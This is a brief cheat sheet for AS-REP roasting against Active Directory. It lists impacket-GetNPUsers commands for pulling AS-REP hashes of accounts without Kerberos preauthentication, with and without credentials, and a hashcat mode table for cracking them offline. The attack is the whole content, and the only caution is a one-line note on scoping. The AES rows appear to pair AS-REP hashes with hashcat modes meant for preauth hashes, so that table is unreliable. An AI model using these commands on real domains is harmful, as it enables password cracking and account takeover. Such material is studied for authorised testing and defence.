AS-REP Roast
Retrieve an AS-REP (TGT reply) for AD users with Do not require Kerberos preauthentication set, then crack offline.
| Action |
Command |
| Request AS-REPs (no creds, list) |
impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep.hashes |
| Single user (no creds) |
impacket-GetNPUsers <domain>/<user> -no-pass -dc-ip <dc_ip> -format hashcat |
| With valid creds |
impacket-GetNPUsers <domain>/<user>:'<password>' -dc-ip <dc_ip> -request -format hashcat -outputfile asrep.hashes |
Crack With Hashcat
- Identify the hash type below
| AS-REP etype |
Hashcat mode |
Hash format signature (starts like…) |
| RC4-HMAC (etype 23) |
18200 |
$krb5asrep$23$user@REALM.LOCAL:<salt_or_checksum>$<hex…> |
| AES128-CTS-HMAC-SHA1-96 (etype 17) |
19800 |
$krb5asrep$17$user@REALM.LOCAL:<hex…> |
| AES256-CTS-HMAC-SHA1-96 (etype 18) |
19900 |
$krb5asrep$18$user@REALM.LOCAL:<hex…> |
Notes
- Etype depends on domain/account crypto settings; you may see etype 23 or AES (17/18).
- Requests are visible on DCs (TGT requests for accounts without preauth); scope operations appropriately.